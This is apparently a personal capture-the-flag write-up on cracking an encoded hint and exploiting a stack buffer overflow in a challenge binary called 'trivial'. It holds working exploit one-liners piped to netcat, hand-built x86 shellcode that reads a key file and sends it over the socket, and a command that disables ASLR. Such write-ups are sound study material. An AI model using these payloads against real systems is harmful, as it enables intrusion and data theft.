Trivial
=======

Are first handed some base64, so decode with:

```sh
$ cat provided/original_base64 | base64 -d > provided/salted_string
```

To get a salted OpenSSL string (identifiable with the `Salted__` prefix.)  Then
run Adams brute forcer script which just injests rockyou.txt and encodes via
aes-256-cbc, which is a super popular cipher... and compare that to likely
passwords.  Gets a hit with `secret`.  Lol.

```sh
$ ./adam_brute.sh 2>/dev/null
secret
aHR0cDovL3RyaXZpYWwucm13aGl0ZWhhdHMuY29tOjgwMDAK
```

This spits out another base64 (`provided/bruted_string`), decode it again to
get a web url:

```sh
cat provided/bruted_string | base64 -d > provided/website_url
```

URL: `http://trivial.rmwhitehats.com:8000/`

This site provides us with a binary and proc map and installation script
showing how the server runs.  pwn it.

Break out Ghidra, run standard analysis, poke around functions to see the
important bit, the function `trivial`.

Ghidra decompiles to:

```c
int trivial(int sockfd) {
  char fillme[128];
  read(sockfd, fillme, 0x200);
  sendstr(sockfd, "Geronimo!\n");
  return 0;
}
```

So we have a 128 byte buffer and are writing 512 bytes to it, there's our
overflow.

According to smash the stack memory layout looks like:

[128 bytes fillme][4 bytes temp_var][4 bytes sfp][4 bytes ret][4 bytes sockfd]

Our payload will likely fit within the 128 bytes of fillme, so let's just plan
on that.

```sh
objdump -M intel -d trivial
```

Section of interest:

```
080489bd <trivial>:
 80489bd:	55                   	push   ebp
 80489be:	89 e5                	mov    ebp,esp
 80489c0:	81 ec 98 00 00 00    	sub    esp,0x98
 80489c6:	c7 44 24 08 00 02 00 	mov    DWORD PTR [esp+0x8],0x200
 80489cd:	00
 80489ce:	8d 85 78 ff ff ff    	lea    eax,[ebp-0x88]
 80489d4:	89 44 24 04          	mov    DWORD PTR [esp+0x4],eax
 80489d8:	8b 45 08             	mov    eax,DWORD PTR [ebp+0x8]
 80489db:	89 04 24             	mov    DWORD PTR [esp],eax
 80489de:	e8 1d fb ff ff       	call   8048500 <read@plt>
 80489e3:	c7 44 24 04 2d 8b 04 	mov    DWORD PTR [esp+0x4],0x8048b2d
 80489ea:	08
 80489eb:	8b 45 08             	mov    eax,DWORD PTR [ebp+0x8]
 80489ee:	89 04 24             	mov    DWORD PTR [esp],eax
 80489f1:	e8 17 fd ff ff       	call   804870d <sendstr>
 80489f6:	b8 00 00 00 00       	mov    eax,0x0
 80489fb:	c9                   	leave
 80489fc:	c3                   	ret
```

QEMU
====

To run qemu in user mode for i386 CPUs with gdb stub support on port 2112:

```sh
$ qemu-i386 -g 2112 <program>
```

[ref](https://qemu-project.gitlab.io/qemu/user/main.html)

GDB
===

To handle the gdb session for a qemu user mode debug, do:

```sh
(gdb) target remote :2112
```

[ref](https://sourceware.org/gdb/current/onlinedocs/gdb/Connecting.html)

To attach to a local session on port 2112.

```gdb
(gdb) set follow-fork-mode child
```

will follow child processes spawned (will require killing parent later as `gdb`
lets it go.) Hand `gdb` the address of interest with

```gdb
(gdb) break *0x080489de
```

To print memory in gdb use `x` command like

`x/nfu addr` where n is count, f is format, u is unit size.
`x/1xw <addr>` is print 1 word (4 bytes) in hex.
`x/3xw $ebp-4` is print 3 words, starting 1 word below the base pointer,
including the base pointer, and the word above it.

```gdb
(gdb) layout asm
```

is a fantastic command that opens up an assembly view to see context.

If a particular `gdb` session has a few commands you are always running on
start up you can create a configuration file with those commands at
`$HOME/.gdbinit` which will run them as soon as you start `gdb` up.

Python
======

To get python3 to spit out raw bytes do like:

```sh
$ python -c "import sys; sys.stdout.buffer.write(b'\xff' * 10)"
```

to fill right up to the %ebp, need 136 bytes.

```sh
$ python -c "import sys; sys.stdout.buffer.write(b'A'*136 + b'B'*4 + b'C'*4)" | nc 0.0.0.0 31337
```

successfully sets %ebp to 0x42424242 and jumps %eip to 0x43434343 upon return
from the trivial function on my local machine.  Now to craft payload, and jump
to it!

Starts filling at `%ebp-0x88`, useful for relative addressing stuff.

```gdb
(gdb) print $ebp
$1 = (void *) 0xffffd0e8
(gdb) x/8xw $ebp-0x98
0xffffd050:	0x00000004	0x08048b2d	0x00000200	0xf7ffd000
0xffffd060:	0x41414141	0x41414141	0x41414141	0x41414141
```

And we see that confirmed in gdb, since `0xffffd0e8 - 0x88 = 0xffffd060`.

Original:

```gdb
(gdb) x/8xw $ebp-16
0xffffd0d8:	0x00000000	0x00000000	0xf7f96000	0xf7f96000
0xffffd0e8:	0xffffd158	0x0804894c	0x00000004	0xffffd11c
```

Now we test our understanding by compiling a program that just makes the exit
syscall:

```asm
section .text

global _start
_start:
  mov eax, 1
  int 0x80
```

and doing:

```sh
styty@kerbin:~/trivial$ objdump -M intel -d exit

exit:     file format elf32-i386


Disassembly of section .text:

08049000 <_start>:
 8049000:	b8 01 00 00 00       	mov    eax,0x1
 8049005:	cd 80                	int    0x80
 ```

So our code injection in this case is simply the 7 byte sequence:

`\xb8\x01\x00\x00\x00\x00\xcd\x80`

We send this as:

```sh
$ python -c "import sys; sys.stdout.buffer.write(b'\xb8\x01\x00\x00\x00\xcd\x80' + b'A'*129 + b'\x58\xd1\xff\xff' + b'\x60\xd0\xff\xff')" | nc 0.0.0.0 31337
```

gets us to:

```gdb
(gdb) x/40xw $ebp-144
0xffffd058:     0x00000200      0xf7ffd000      0x000001b8      0x4180cd00
0xffffd068:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd078:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd088:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd098:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd0a8:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd0b8:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd0c8:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd0d8:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd0e8:     0xffffd158      0xffffd060      0x00000004      0xffffd11c
```

and following the program along in `gdb` we see it properly overwrites the
return address and jumps to the beginning of our buffer and calls the syscall
exit.  Eureka!

Statck pointer is `0xffffd0f0` when we enter our injected code. String is
stored at `0xffffd060`.  Then offset should be `0xffffd060 - 0xffffd0f0 = 0x90`

```sh
python -c "import sys; sys.stdout.buffer.write(b'/home/trivial/key\x00' + b'\xb8\x05\x00\x00\x00\x8d\x9c\x24\x70\xff\xff\xff\xb9\x00\x00\x00\x00\xcd\x80\x89\xc3\xb8\x03\x00\x00\x00\x8d\x4c\x24\xcc\xba\x40\x00\x00\x00\xcd\x80\x89\xc2\xb8\x04\x00\x00\x00\x8b\x1c\x24\x8d\x4c\x24\xcc\xcd\x80' + b'A'*65 + b'\x58\xd1\xff\xff' + b'\x72\xd0\xff\xff')" | nc 0.0.0.0 31337
```

```gdb
(gdb) x/40xw $ebp-144
0xffffd058:     0x00000200      0xf7ffd000      0x6d6f682f      0x72742f65
0xffffd068:     0x61697669      0x656b2f6c      0x05b80079      0x8d000000
0xffffd078:     0xff70249c      0x00b9ffff      0xcd000000      0xb8c38980
0xffffd088:     0x00000003      0xcc244c8d      0x000040ba      0x8980cd00
0xffffd098:     0x0004b8c2      0x1c8b0000      0x244c8d24      0x4180cdcc
0xffffd0a8:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd0b8:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd0c8:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd0d8:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd0e8:     0xffffd158      0xffffd072      0x00000004      0xffffd11c
(gdb) x/160xb $ebp-144
0xffffd058:     0x00    0x02    0x00    0x00    0x00    0xd0    0xff    0xf7
0xffffd060:     0x2f    0x68    0x6f    0x6d    0x65    0x2f    0x74    0x72
0xffffd068:     0x69    0x76    0x69    0x61    0x6c    0x2f    0x6b    0x65
0xffffd070:     0x79    0x00    0xb8    0x05    0x00    0x00    0x00    0x8d
0xffffd078:     0x9c    0x24    0x70    0xff    0xff    0xff    0xb9    0x00
0xffffd080:     0x00    0x00    0x00    0xcd    0x80    0x89    0xc3    0xb8
0xffffd088:     0x03    0x00    0x00    0x00    0x8d    0x4c    0x24    0xcc
0xffffd090:     0xba    0x40    0x00    0x00    0x00    0xcd    0x80    0x89
0xffffd098:     0xc2    0xb8    0x04    0x00    0x00    0x00    0x8b    0x1c
0xffffd0a0:     0x24    0x8d    0x4c    0x24    0xcc    0xcd    0x80    0x41
0xffffd0a8:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd0b0:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd0b8:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd0c0:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd0c8:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd0d0:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd0d8:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd0e0:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd0e8:     0x58    0xd1    0xff    0xff    0x72    0xd0    0xff    0xff
0xffffd0f0:     0x04    0x00    0x00    0x00    0x1c    0xd1    0xff    0xff
```

VICTORY

Payload
=======

Created a simple toy program:

```c
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

int main() {

  int sockfd = 4;
  char my_str[128];
  int str_len = 128;
  int key_fd = open("/home/trivial/key", O_RDONLY);
  read(key_fd, my_str, str_len);
  write(sockfd, my_str, str_len);

  return 0;
}
```

To figure out how to craft "shell" code payload.  Relevant disassembles is this:

```sh
0000120d <main>:
    120d:	f3 0f 1e fb          	endbr32
    1211:	8d 4c 24 04          	lea    ecx,[esp+0x4]
    1215:	83 e4 f0             	and    esp,0xfffffff0
    1218:	ff 71 fc             	push   DWORD PTR [ecx-0x4]
    121b:	55                   	push   ebp
    121c:	89 e5                	mov    ebp,esp
    121e:	53                   	push   ebx
    121f:	51                   	push   ecx
    1220:	81 ec 90 00 00 00    	sub    esp,0x90
    1226:	e8 e5 fe ff ff       	call   1110 <__x86.get_pc_thunk.bx>
    122b:	81 c3 a5 2d 00 00    	add    ebx,0x2da5
    1231:	c7 45 f4 04 00 00 00 	mov    DWORD PTR [ebp-0xc],0x4
    1238:	c7 45 f0 80 00 00 00 	mov    DWORD PTR [ebp-0x10],0x80
    123f:	83 ec 08             	sub    esp,0x8
    1242:	6a 00                	push   0x0
    1244:	8d 83 38 e0 ff ff    	lea    eax,[ebx-0x1fc8]
    124a:	50                   	push   eax
    124b:	e8 50 fe ff ff       	call   10a0 <open@plt>

    1250:	83 c4 10             	add    esp,0x10
    1253:	89 45 ec             	mov    DWORD PTR [ebp-0x14],eax
    1256:	8b 45 f0             	mov    eax,DWORD PTR [ebp-0x10]
    1259:	83 ec 04             	sub    esp,0x4
    125c:	50                   	push   eax
    125d:	8d 85 6c ff ff ff    	lea    eax,[ebp-0x94]
    1263:	50                   	push   eax
    1264:	ff 75 ec             	push   DWORD PTR [ebp-0x14]
    1267:	e8 24 fe ff ff       	call   1090 <read@plt>

    126c:	83 c4 10             	add    esp,0x10
    126f:	8b 45 f0             	mov    eax,DWORD PTR [ebp-0x10]
    1272:	83 ec 04             	sub    esp,0x4
    1275:	50                   	push   eax
    1276:	8d 85 6c ff ff ff    	lea    eax,[ebp-0x94]
    127c:	50                   	push   eax
    127d:	ff 75 f4             	push   DWORD PTR [ebp-0xc]
    1280:	e8 3b fe ff ff       	call   10c0 <write@plt>

    1285:	83 c4 10             	add    esp,0x10
    1288:	b8 00 00 00 00       	mov    eax,0x0
    128d:	8d 65 f8             	lea    esp,[ebp-0x8]
    1290:	59                   	pop    ecx
    1291:	5b                   	pop    ebx
    1292:	5d                   	pop    ebp
    1293:	8d 61 fc             	lea    esp,[ecx-0x4]
    1296:	c3                   	ret
```

Our payload memory structure will be:

Low Address                                                      High Addresses
  ???     17 bytes           1    4     ???      ???      ???
[ nops | /home/trivial/key | \0 | 17 | open() | read() | write()              ]

### Open()

We first need to pound the string `/home/trivial/key` into the payload to hand
off to the `open()` syscall, then we need to call `open()` with that and the
`O_RDONLY` flag.  The relevant part of the dump is:

```
    123f:       83 ec 08                sub    esp,0x8
    1242:       6a 00                   push   0x0
    1244:       8d 83 38 e0 ff ff       lea    eax,[ebx-0x1fc8]
    124a:       50                      push   eax
    124b:       e8 50 fe ff ff          call   10a0 <open@plt>
    1250:       83 c4 10                add    esp,0x10
```

First we push the right most argument (apparently `O_RDONLY` enums to 0) and
then we load the string with `lea`.  We'll have to carefully set the offset
from %ebp to the right location in our payload.

After this we grab the return file descriptor and will hand this off to the
`read()` syscall, as well as a pointer to some space in our payload for
a buffer to read to, and an integer representing the size of data we want to
read (space in our buffer.)

Finally, we can make a `write()` syscall which should be able to take the
string we've read the key to, the returned size of the key from the `read()`
syscall, and the file descriptor integer for the open socket (which is an
argument passed to the `trivial()` function.)  This in theory should pound the
key into our open socket where netcat is waiting.

Hex for the string literal `/home/trivial/key`:

`\0x79\0x65\0x6b\0x2f\0x6c\0x61\0x69\0x76\0x69\0x72\0x74\0x2f\0x65\0x6d\0x6f\0x68\0x2f`

Followed by a null terminator `0x00`.

Followed by code for the `open()` call:

```asm
push 0
lea eax,[ebx-???]
push eax
call open (find open address in libc used!)
```

To make this call we need to find where the open syscall lies in libc6 that
trivial is dynamically linked to... ASLR is turned off according to the
`install.sh` script so it should end up in the same place every time as long as
we can just find it in the first place.  Once we have that, then we can figure
out the relative address of the `open()` call to the `e8` call in our shell
code, and that will be what we fill in for the last line above.

After making this call the keys file descriptor should be in `%eax`.

### read()

We want the following:

```c
...
num_bytes_read = read(key_file_descriptor, string ("/home/trivial/key"), string_length (17))
...
```

This should be in bytecode:

```asm
push 17
lea eax,[ebp-0x????]
push eax
lea eax,[ebp-0x????]
push eax
call 0x08048500 <read@plt>
```

Note that in the trivial binary the `read()` call is at address `0x08048500`.

After read returns `%eax` should be populated with the number of bytes read,
which will be useful for the `write()` syscall which comes next.

### write()

We want to do this:

```c
...
write(sockfd, my_str, str_len);
...
```

```asm
push [ebp+8]
call 0x080485a0 <write@plt>
```

Note that in the trivial binary the `write()` call is at address `0x080485a0`.


ASLR
====

TIL how to disable ASLR:

```sh
$ echo 0 > /proc/sys/kernel/randomize_va_space
```

My setting prior to messing with anything is `2`.

```sh
$ cat /proc/sys/kernel/randomize_va_space
2
```

x86 Learnings
=============

A nice [reference](https://flint.cs.yale.edu/cs421/papers/x86-asm/asm.html).

[nasm tutorial](https://cs.lmu.edu/~ray/notes/nasmtutorial/)

[nasm cheat sheet](https://www.cs.uaf.edu/2005/fall/cs301/support/x86/nasm.html)

[Another with 32 bit syntax](https://en.wikibooks.org/wiki/X86_Assembly/NASM_Syntax)

[Assembly System Calls](https://www.tutorialspoint.com/assembly_programming/assembly_system_calls.htm)

[32 Bit Syscall Table](https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_32.tbl)

### Memory Structure

Note that program instruction memory is byte addressable, so having
instructions start on odd addresses is perfectly fine.  Memory for variables
and stack, however, is all word aligned, and should always lay on a multiple of
4 (32 bit) or 8 (64 bit) words.

### Passing Arguments to Functions

Arguments passed to function by pushing to stack, STARTING with the right most
arguments in function call and moving to the left.  Then `call` function will
push instruction pointer to stack (return address).

Example function call:

```c
...
function(1, 2, 3);
...
```

```asm
pushl $0x3
pushl $0x2
pushl $0x1
call 0x8000470
```

Another example:

```c
...
char some_str[] = "my string";
function(0, some_str, 0);
...
```

```asm
    ...
    1214:	c7 45 ea 6d 79 20 73 	mov    DWORD PTR [ebp-0x16],0x7320796d
    121b:	c7 45 ee 74 72 69 6e 	mov    DWORD PTR [ebp-0x12],0x6e697274
    1222:	66 c7 45 f2 67 00    	mov    WORD PTR [ebp-0xe],0x67
    1228:	6a 00                	push   0x0
    122a:	8d 45 ea             	lea    eax,[ebp-0x16]
    122d:	50                   	push   eax
    122e:	6a 00                	push   0x0
    1230:	e8 98 ff ff ff       	call   11cd <my_func>
    ...
```

In the above we see the local string literal being stored in stack in main()
scope, followed by literal 0 being pushed to stack (far right argument), then
`%eax` gets loaded with the string literals address, then `%eax` gets pushed to
stack (2nd argument), and finally the left most argument (another literal 0)
gets pushed to stack.  Finally `my_func` gets called.

### Function Prologue

The first thing a function will always do is push the frame pointer to stack,
then copies the current stack pointer to the frame pointer, and finally updates
the stack pointer by subtracting space for all the local variables. This is
called the function prologue.

Example prologue:

```asm
pushl %ebp
movl %esp,%ebp
subl $20,%esp
```

The above example allocates 5 words for local variables on stack.
